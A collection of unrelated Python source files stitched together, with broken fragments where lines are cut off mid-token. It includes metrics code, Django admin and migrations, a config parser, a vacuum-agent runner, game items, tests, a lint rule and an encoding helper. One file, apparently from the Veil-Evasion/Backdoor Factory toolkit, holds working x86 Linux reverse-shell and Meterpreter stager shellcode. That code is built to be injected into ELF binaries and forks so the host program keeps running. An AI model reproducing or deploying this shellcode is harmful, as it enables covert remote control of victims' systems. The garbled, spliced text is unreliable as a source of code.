ms.close()
# param state: string Get the average metrics (throughput, latency) for this state.
# return a dictionary with the averages
def get_averages(self, state):
averages = {}
if self.sumMetrics.has_key(state):
averages['throughput'] = float(self.sumMetrics[state]['throughput'] / self.sumMetrics[state]['divide_by'])
averages['latency'] = float(self.sumMetrics[state]['latency'] / self.sumMetrics[state]['divide_by'])
self.log.debug("GETAVERAGES Average metrics for state: " + state + " num of measurements: " + str(
|
self.sumMetrics[state]['divide_by']) +
" av. throughput: " + str(averages['throughput']) + " av. latency: " +
str(averages['latency']))
return averages
def doKmeans(self, state, from_inlambda, to_inlambda):
# Run kmeans for the measurements of this state and return the centr
|
oid point (throughput, latency)
ctd = {}
label = []
centroids = {}
if self.memory[state]['arrayMeas'] != None:
count_state_measurements = len(self.memory[state]['arrayMeas'])
# self.log.debug("DOKMEANS " + str(len(self.memory[state]['arrayMeas'])) +
# " measurements available for state " + state)
sliced_data = None
for j in self.memory[state]['arrayMeas']:
#self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
# If this measurement belongs in the slice we're insterested in
if j[0] >= from_inlambda and j[0] <= to_inlambda:
#self.my_logger.debug("DOKMEANS adding measurement : "+ str(j))
# add it
if sliced_data == None:
|
moshthepitt/product.co.ke
|
core/admin.py
|
Python
|
mit
| 458
| 0.004367
|
from django.contrib import admin
from django.contrib.flatpages.admin import FlatPageAdmin
from django.contrib.flatpages.models import FlatPage
from django.db import models
from suit_redactor.widgets import Red
|
actorWidget
class FlatPageCustom(FlatPageAdmin):
formfield_overrides = {
models.TextField: {'widget': RedactorWidget(editor_opti
|
ons={'lang': 'en'})}
}
admin.site.unregister(FlatPage)
admin.site.register(FlatPage, FlatPageCustom)
|
cbrunker/quip
|
lib/Utils.py
|
Python
|
gpl-3.0
| 4,795
| 0.003337
|
#
# Utility functions
#
import sys
from functools import partial
from uuid import UUID
from hashlib import sha1
from os import path, listdir
from zipfile import ZipFile
from subprocess import Popen, TimeoutExpired
import nacl.utils
import nacl.secret
def isValidUUID(uid):
"""
Validate UUID
@param uid: UUID value to be verfied, can be bytes or str
@return: True if UUID valid, else False
"""
try:
# attempt convertion from bytes to str
uid = uid.decode('ascii')
except AttributeError:
# is already bytes object
pass
except UnicodeDecodeError:
# uid contains non-ascii characters, invalid UUID
return False
try:
out = UUID(uid, version=4)
except ValueError:
return False
# check converted value from UUID equals original value. UUID class is not strict on input
return str(out) == uid
def encrypt(safe, *args):
"""
Encrypt all provided data
@param safe: encryption class
@param args: data to be encrypted
@return: encryption output iterable
"""
return (safe.encrypt(a, nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)) for a in args)
def sha1sum(filePath, blocksize=1024):
"""
Calculate SHA1 hash of file
@param filePath: Path to hashable file
@param blocksize: Amount of bytes to read into memory before hashing
@return: SHA1 hash value (bytes)
"""
with open(filePath, mode='rb') as f:
out = sha1()
for buf in iter(partial(f.read, blocksize), b''):
out.update(buf)
return bytes(out.hexdigest(), encoding='ascii')
def checkCerts():
"""
Checks to see if required TLS certificates exist in Resources directory. Attempts to generate certificates if not found
@returns: Boolean value based on success
"""
resDir = absolutePath('Resources')
command = None
success = False
# check to see if required certificates exist
if not all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
############
# Check OS
############
if sys.platform in ('linux', 'darwin'):
# bash script run
command = 'sh {}'.format('create_certs_linux.sh')
elif sys.platform == 'win32':
hasOpenSSL = False
# check for openssl requirement (downloaded during installer run)
files = sorted((path.isdir(f), f) for f in listdir(resDir) if f.lower().startswith('openssl-'))
# check for expanded directory and executable
for isDir, ofile in files:
if isDir and path.isfile(path.join(resDir, ofile, 'openssl.exe')):
hasOpenSSL = True
newDir = ofile
break
if not hasOpenSSL and files:
|
# sorted filename to list newest version first)
|
for ofile in sorted(f for isDir, f in files if not isDir and path.splitext(f)[1] == '.zip'):
# extract archive
with ZipFile(path.join(resDir, ofile), 'r') as ozip:
newDir = path.join(resDir, path.splitext(ofile)[0])
ozip.extractall(path=newDir)
# verify openssl.exe exists in directory
if path.isfile(path.join(newDir, 'openssl.exe')):
hasOpenSSL = True
break
if hasOpenSSL:
# write openssl directory to config file
with open(path.join(resDir, 'openssl.cfg'), 'w') as config:
config.writelines([newDir])
# windows bat command file
command = r'cmd /c {}'.format('create_certs_windows.bat')
if command:
proc = Popen([command], cwd=resDir, shell=True)
try:
proc.wait(180)
except TimeoutExpired:
proc.kill()
# check command has generated correct files
if all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
success = True
else:
success = True
return success
def absolutePath(pathname):
"""
Return the absolute path of the given file or directory
@return: absolute path
"""
if getattr(sys, 'frozen', False):
# Frozen application denotes packaged application, modules are moved into a zip
datadir = path.dirname(sys.executable)
else:
# Source based installation, use parent directory of this module's directory
datadir = path.join(path.dirname(__file__), path.pardir)
return path.abspath(path.join(datadir, pathname))
|
tdimiduk/groupeng
|
src/input_parser.py
|
Python
|
agpl-3.0
| 2,845
| 0.002109
|
# Copyright 2011, Thomas G. Dimiduk
#
# This file is part of GroupEng.
#
# GroupEng is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GroupEng is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with GroupEng. If not, see <http://www.gnu.org/licenses/>.
import re
from .utility import numberize
from .errors import GroupEngFileError
def read_input(infile):
if not hasattr(infile, 'readlines'):
infile = open(infile, 'U')
lines = infile.readlines()
lines = [l.strip() for l in lines if l.strip() != '' and l.strip()[0] != '#']
dek = {}
rules = []
i = 0
while i < len(lines):
line = lines[i]
if re.match('class_?list', line):
dek['classlist'] = split_key(line)[1]
elif re.match('(group_?)?size', line):
dek['group_size'] = split_key(line)[1]
elif re.match('student_identifier', line) or re.match('[Ii][Dd]', line):
dek['student_identifier'] = split_key(line)[1]
elif re.match('number_of_groups', line):
dek['number_of_groups'] = int(split_key(line)[1])
elif re.match('tries', line):
dek['tries'] = int(split_key(line)[1])
elif line[0] == '-':
line = line[1:]
# read a rule
rule = {}
rule['name'] = split_key(line)[0].lower()
rule['attribute'] = split_key(line)[1]
# re
|
ad extra arguments
while i+1 < len(lines) and lines[i+1][0] != '-':
i += 1
line = lines[i]
key, val = split_key(line)
val = tuple([v.strip() for
|
v in val.split(',')])
vals = []
for v in val:
vals.append(union_group(v))
if len(vals) == 1:
vals = vals[0]
rule[key] = vals
rules.append(rule)
else:
raise GroupEngFileError(line, i+1, infile.name)
i += 1
dek['rules'] = rules
return dek
def split_key(st):
return [s.strip() for s in st.split(':')]
def union_group(item):
items = [i.strip() for i in item.split('=')]
if items[0][0] == '(':
items[0] = items[0][1:]
if items[-1][-1] == ')':
items[-1] = items[-1][:-1]
items = tuple([numberize(i) for i in items])
if len(items) == 1:
items = items[0]
return items
|
austinban/aima-python
|
submissions/Porter/vacuum2Runner.py
|
Python
|
mit
| 6,343
| 0.006779
|
import agents as ag
import envgui as gui
# change this line ONLY to refer to your project
import submissions.Porter.vacuum2 as v2
# ______________________________________________________________________________
# Vacuum environmenty
class Dirt(ag.Thing):
pass
class VacuumEnvironment(ag.XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=4, height=3):
super(VacuumEnvironment, self).__init__(width, height)
self.add_walls()
def thing_classes(self):
return [ag.Wall, Dirt,
# ReflexVacuumAgent, RandomVacuumAgent,
# TableDrivenVacu
|
umAgent, ModelBa
|
sedVacuumAgent
]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
bump = ('Bump' if agent.bump else'None')
return (bump, status)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
dirt = dirt_list[0]
agent.performance += 100
self.delete_thing(dirt)
else:
super(VacuumEnvironment, self).execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
# # Launch a Text-Based Environment
# print('Two Cells, Agent on Left:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Right:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (2, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Top:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Bottom:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 2))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
def testVacuum(label, w=4, h=3,
dloc=[(1,1),(2,1)],
vloc=(1,1),
limit=6):
print(label)
v = VacuumEnvironment(w, h)
for loc in dloc:
v.add_thing(Dirt(), loc)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
v.add_thing(a, vloc)
t = gui.EnvTUI(v)
t.mapImageNames({
ag.Wall: '#',
Dirt: '@',
ag.Agent: 'V',
})
t.step(0)
t.list_things(Dirt)
t.step(limit)
if len(t.env.get_things(Dirt)) > 0:
t.list_things(Dirt)
else:
print('All clean!')
# Check to continue
if input('Do you want to continue [Y/n]? ') == 'n':
exit(0)
else:
print('----------------------------------------')
testVacuum('Two Cells, Agent on Left:')
testVacuum('Two Cells, Agent on Right:', vloc=(2,1))
testVacuum('Two Cells, Agent on Top:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,1) )
testVacuum('Two Cells, Agent on Bottom:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,2) )
testVacuum('Five Cells, Agent on Left:', w=7, h=3,
dloc=[(2,1), (4,1)], vloc=(1,1), limit=12)
testVacuum('Five Cells, Agent near Right:', w=7, h=3,
dloc=[(2,1), (3,1)], vloc=(4,1), limit=12)
testVacuum('Five Cells, Agent on Top:', w=3, h=7,
dloc=[(1,2), (1,4)], vloc=(1,1), limit=12 )
testVacuum('Five Cells, Agent Near Bottom:', w=3, h=7,
dloc=[(1,2), (1,3)], vloc=(1,4), limit=12 )
testVacuum('5x4 Grid, Agent in Top Left:', w=7, h=6,
dloc=[(1,4), (2,2), (3, 3), (4,1), (5,2)],
vloc=(1,1), limit=46 )
testVacuum('5x4 Grid, Agent near Bottom Right:', w=7, h=6,
dloc=[(1,3), (2,2), (3, 4), (4,1), (5,2)],
vloc=(4, 3), limit=46 )
v = VacuumEnvironment(6, 3)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
c.mapImageNames({
ag.Wall: 'images/wall.jpg',
# Floor: 'images/floor.png',
Dirt: 'images/dirt.png',
ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop()
|
codercold/Veil-Evasion
|
tools/backdoor/intel/LinuxIntelELF32.py
|
Python
|
gpl-3.0
| 5,166
| 0.00542
|
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
Linux ELFIntel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
Modified metasploit linux/x64/shell_reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
Modified metasploit linux/x64/shell/reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
|
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80
|
\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
For user with position independent shellcode from the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
|
rsalmaso/django-cms
|
cms/migrations/0015_auto_20160421_0000.py
|
Python
|
bsd-3-clause
| 391
| 0.002558
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20160404_1908'),
]
operations = [
migrations.AlterField(
model_name='cmsplugin',
name='position',
field=models.PositiveSma
|
llInte
|
gerField(default=0, verbose_name='position', editable=False),
),
]
|
rbmj/pyflightcontrol
|
pyflightcontrol/base/__init__.py
|
Python
|
apache-2.0
| 305
| 0
|
from . import font
from .i
|
ndicator import Indicator, IndicatorOptions
from .airspeed import AirspeedIndicator
from .altitude import AltitudeIndicator
from .attitude import AttitudeIndicator
from .compass import CompassIndicator
from .pfd import PFD
from .joystic
|
k import Joystick
from . import base_test
|
MarxMustermann/OfMiceAndMechs
|
src/itemFolder/military/bomb.py
|
Python
|
gpl-3.0
| 1,990
| 0.009045
|
import src
import random
class Bomb(src.items.Item):
"""
ingame item to kill things and destroy stuff
"""
type = "Bomb"
name = "bomb"
description = "designed to explode"
usageInfo = """
The explosion will damage/destroy everything on the current tile or the container.
Activate it to trigger a exlosion.
"""
bolted = False
walkable = True
def __init__(self):
"""
initialise state
"""
super().__init__(display=src.canvas.displayChars.bomb)
def apply(self, character):
"""
handle a character trying to use this item
by exploding
Parameters:
character: the character trying to use this item
"""
character.addMessage("the bomb starts to fizzle")
event = src.events.R
|
unCallbackEvent(
#src.gamestate.gamestate.tick+random.randint(1,4)+delay
src.gamestate.gamestate.tick+1
)
event.setCallback({"container": self, "method": "destroy"})
self.container.addEvent(event)
def destroy(self, generateScrap=True):
"""
destroy the item
Parameters:
generateScrap: flag to toggle leaving residue
"""
if not self.xPosition or not self.yPosition:
return
|
offsets = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
random.shuffle(offsets)
delay = 1
if isinstance(self.container,src.rooms.Room):
delay = 2
for offset in offsets[:-1]:
new = src.items.itemMap["Explosion"]()
self.container.addItem(new,(self.xPosition-offset[0],self.yPosition-offset[1],self.zPosition))
event = src.events.RunCallbackEvent(
src.gamestate.gamestate.tick + delay
)
event.setCallback({"container": new, "method": "explode"})
self.container.addEvent(event)
super().destroy(generateScrap=False)
src.items.addType(Bomb)
|
huaiping/pandora
|
salary/models.py
|
Python
|
mit
| 332
| 0.03012
|
from django.db import models
class Salary(models.Model):
id = models.AutoField(prim
|
ary_key = True)
bh = models.CharField(max_length = 10)
xm = models.CharField(max_length = 12)
status = models.CharField(max_length = 8)
class Meta:
db_table = 'swan_salary'
|
def __str__(self):
return self.id
|
PeterDowdy/py-paradox-convert
|
tests/serialization_tests.py
|
Python
|
mit
| 2,040
| 0.007353
|
import unittest
import serializer
__author__ = 'peter'
class SerializationTests(unittest.TestCase):
def test_serialize_single_key_value_pair(self):
input = [{ 'name': 'value' }]
expected_output = "name=value"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_non_string_type(self):
input = [{ 'name': 5.0 }]
expected_output = "name=5.0"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_single_key_multi_value(self):
input = [{ 'name': ['firs
|
t', 'second']}]
expected_output = 'name={\r\n\tfirst\r\n\tsecond\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(ex
|
pected_output, output), 0)
def test_serialize_array_of_kvps(self):
input = [{'name one': 'value one'},{'name two':'value two'}]
expected_output = 'name one=value one\r\nname two=value two'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_array(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': 'derp2'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2=derp2\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_doubly_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': [{'more_nesting':'a thing'}]}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2={\r\n\t\tmore_nesting=a thing\r\n\t}\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
|
xbmcmegapack/plugin.video.megapack.dev
|
resources/lib/menus/home_countries_virgin_islands_us.py
|
Python
|
gpl-3.0
| 1,134
| 0.00265
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If n
|
ot, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Virgin_islands_us():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Li
|
ve", "Movies", "Sports", "TVShows"],
countries=["Virgin Islands, U.S."]))
|
willthames/ansible-lint
|
lib/ansiblelint/rules/GitHasVersionRule.py
|
Python
|
mit
| 1,699
| 0
|
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# TH
|
E SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDIN
|
G BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class GitHasVersionRule(AnsibleLintRule):
id = '401'
shortdesc = 'Git checkouts must contain explicit version'
description = (
'All version control checkouts must point to '
'an explicit commit or tag, not just ``latest``'
)
severity = 'MEDIUM'
tags = ['module', 'repeatability', 'ANSIBLE0004']
version_added = 'historic'
def matchtask(self, file, task):
return (task['action']['__ansible_module__'] == 'git' and
task['action'].get('version', 'HEAD') == 'HEAD')
|
luci/luci-py
|
client/third_party/depot_tools/fix_encoding.py
|
Python
|
apache-2.0
| 12,497
| 0.009842
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Collection of functions and classes to fix various encoding problems on
multi
|
ple platforms with p
|
ython.
"""
from __future__ import print_function
import codecs
import locale
import os
import sys
# Prevents initializing multiple times.
_SYS_ARGV_PROCESSED = False
def complain(message):
"""If any exception occurs in this file, we'll probably try to print it
on stderr, which makes for frustrating debugging if stderr is directed
to our wrapper. So be paranoid about catching errors and reporting them
to sys.__stderr__, so that the user has a higher chance to see them.
"""
print(
isinstance(message, str) and message or repr(message),
file=sys.__stderr__)
def fix_default_encoding():
"""Forces utf8 solidly on all platforms.
By default python execution environment is lazy and defaults to ascii
encoding.
http://uucode.com/blog/2007/03/23/shut-up-you-dummy-7-bit-python/
"""
if sys.getdefaultencoding() == 'utf-8':
return False
# Regenerate setdefaultencoding.
reload(sys)
# Module 'sys' has no 'setdefaultencoding' member
# pylint: disable=no-member
sys.setdefaultencoding('utf-8')
for attr in dir(locale):
if attr[0:3] != 'LC_':
continue
aref = getattr(locale, attr)
try:
locale.setlocale(aref, '')
except locale.Error:
continue
try:
lang, _ = locale.getdefaultlocale()
except (TypeError, ValueError):
continue
if lang:
try:
locale.setlocale(aref, (lang, 'UTF-8'))
except locale.Error:
os.environ[attr] = lang + '.UTF-8'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
return True
###############################
# Windows specific
def fix_win_sys_argv(encoding):
"""Converts sys.argv to 'encoding' encoded string.
utf-8 is recommended.
Works around <http://bugs.python.org/issue2128>.
"""
global _SYS_ARGV_PROCESSED
if _SYS_ARGV_PROCESSED:
return False
if sys.version_info.major == 3:
_SYS_ARGV_PROCESSED = True
return True
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, c_int, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import LPCWSTR, LPWSTR
# <http://msdn.microsoft.com/en-us/library/ms683156.aspx>
GetCommandLineW = WINFUNCTYPE(LPWSTR)(('GetCommandLineW', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/bb776391.aspx>
CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(
('CommandLineToArgvW', windll.shell32))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [
argv_unicode[i].encode(encoding, 'replace') for i in range(0, argc.value)
]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it
# will have been invoked directly. Otherwise, unicode_argv[0] is the
# Python interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b'-') or arg == b'-':
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the
# module source, but never mind.
break
if arg == u'-c':
argv[0] = u'-c'
break
sys.argv = argv
_SYS_ARGV_PROCESSED = True
return True
def fix_win_codec():
"""Works around <http://bugs.python.org/issue6058>."""
# <http://msdn.microsoft.com/en-us/library/dd317756.aspx>
try:
codecs.lookup('cp65001')
return False
except LookupError:
codecs.register(
lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
return True
class WinUnicodeOutputBase(object):
"""Base class to adapt sys.stdout or sys.stderr to behave correctly on
Windows.
Setting encoding to utf-8 is recommended.
"""
def __init__(self, fileno, name, encoding):
# Corresponding file handle.
self._fileno = fileno
self.encoding = encoding
self.name = name
self.closed = False
self.softspace = False
self.mode = 'w'
@staticmethod
def isatty():
return False
def close(self):
# Don't really close the handle, that would only cause problems.
self.closed = True
def fileno(self):
return self._fileno
def flush(self):
raise NotImplementedError()
def write(self, text):
raise NotImplementedError()
def writelines(self, lines):
try:
for line in lines:
self.write(line)
except Exception as e:
complain('%s.writelines: %r' % (self.name, e))
raise
class WinUnicodeConsoleOutput(WinUnicodeOutputBase):
"""Output adapter to a Windows Console.
Understands how to use the win32 console API.
"""
def __init__(self, console_handle, fileno, stream_name, encoding):
super(WinUnicodeConsoleOutput, self).__init__(
fileno, '<Unicode console %s>' % stream_name, encoding)
# Handle to use for WriteConsoleW
self._console_handle = console_handle
# Loads the necessary function.
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, GetLastError, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE, LPWSTR
from ctypes.wintypes import LPVOID # pylint: disable=no-name-in-module
self._DWORD = DWORD
self._byref = byref
# <http://msdn.microsoft.com/en-us/library/ms687401.aspx>
self._WriteConsoleW = WINFUNCTYPE(
